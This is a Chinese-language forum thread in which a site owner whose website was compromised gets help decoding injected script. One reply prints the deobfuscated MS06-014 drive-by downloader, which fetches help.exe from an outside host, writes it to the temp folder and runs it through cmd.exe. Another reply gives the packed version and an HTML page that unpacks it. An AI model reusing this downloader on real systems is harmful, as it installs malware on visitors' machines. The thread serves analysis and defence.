能力值:
( LV2,RANK:10 )
|
-
-
2 楼
1 | function gn(n){var number=Math.random()*n; return Math.round(number)+ '.exe' }try{aaa= "obj" ;bbb= "ect" ;ccc= "Adodb." ;ddd= "Stream" ;eee= "Microsoft." ;fff= "XMLHTTP" ;lj= 'http://ll68.net/admin12/help.exe' ;var df =document.createElement(aaa+bbb); df .setAttribute( "classid" , "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" );var x= df .CreateObject(eee+fff, "" );var S= df .CreateObject(ccc+ddd, "" );S. type =1;x. open ( "GET" ,lj,0);x.send();mz1=gn(1000);var F= df .CreateObject( "Scripting.FileSystemObject" , "" );var tmp=F.GetSpecialFolder(0);var t2;t2=F.BuildPath(tmp, "rising" +mz1);mz1=F.BuildPath(tmp,mz1);S.Open();S.Write(x.responseBody);S.SaveToFile(mz1,2);S.Close();F.MoveFile(mz1,t2);var Q= df .CreateObject( "Shell.Application" , "" );exp1=F.BuildPath(tmp+ '\\system32' , 'cmd.exe' );Q.ShellExecute(exp1, ' /c ' +t2, "" , "open" ,0)}catch(i){i=1}
|
ms06014的马
支持一下 yock
|
能力值:
( LV2,RANK:10 )
|
-
-
3 楼
谢谢二楼的朋友.
请问你是怎么解出来的.特别想知道这个过程.
还有就是这个ms06014
打上相关的补丁是不是就可以防止中招了.
网站都停止更新6个月了.还是有人搞我网站.真吐血~~~
|
能力值:
( LV2,RANK:10 )
|
-
-
4 楼
解密代码
1 2 3 4 5 6 | <html>
<textarea id = "DecryptText" cols= "100%" rows= "100%" >hello< /textarea >
< /html >
<script language=javascript>
a=( function (p,a,c,k,e,d){e= function (c){ return (c<a? '' :e(parseInt(c /a )))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))}; if (! '' .replace(/^/,String)){ while (c--)d[e(c)]=k[c]||e(c);k=[ function (e){ return d[e]}];e= function (){ return '\\w+' };c=1}; while (c--) if (k[c])p=p.replace(new RegExp( '\\b' +e(c)+ '\\b' , 'g' ),k[c]); return p}( '1c e(n){3 o=p.1b()*n;1a p.19(o)+\'.9\'}18{m="17";l="16";h="15.";g="14";k="13.";j="12";f=\'11://10/Z/Y.9\';3 4=X.W(m+l);4.V("U","T:R-P-O-N-M");3 x=4.8(k+j,"");3 S=4.8(h+g,"");S.L=1;x.b("K",f,0);x.J();5=e(I);3 F=4.8("H.G","");3 7=F.E(0);3 6;6=F.a(7,"D"+5);5=F.a(7,5);S.C();S.B(x.A);S.z(5,2);S.y();F.w(5,6);3 Q=4.8("v.u","");d=F.a(7+\'\\\\t\',\'s.9\');Q.r(d,\' /c \'+6,"","b",0)}q(i){i=1}' ,62,75, '|||var|df|mz1|t2|tmp|CreateObject|exe|BuildPath|open||exp1|gn|lj|ddd|ccc||fff|eee|bbb|aaa||number|Math|catch|ShellExecute|cmd|system32|Application|Shell|MoveFile||Close|SaveToFile|responseBody|Write|Open|rising|GetSpecialFolder||FileSystemObject|Scripting|1000|send|GET|type|00C04FC29E36|983A|11D0|65A3||BD96C556||clsid|classid|setAttribute|createElement|document|help|admin12|ll68.net|http|XMLHTTP|Microsoft|Stream|Adodb|ect|obj|try|round|return|random|function' . split ( '|' ),0,{}))
document.getElementById( "DecryptText" ).value=a;< /script >
|
其实很简单
打了补丁 应该就没事了
|
能力值:
( LV2,RANK:10 )
|
-
-
5 楼
原来是用IE把加密后的东西解出来.
又学到一实用招.
再次感谢
你应该经常接触网页编程的吧?
|
|
|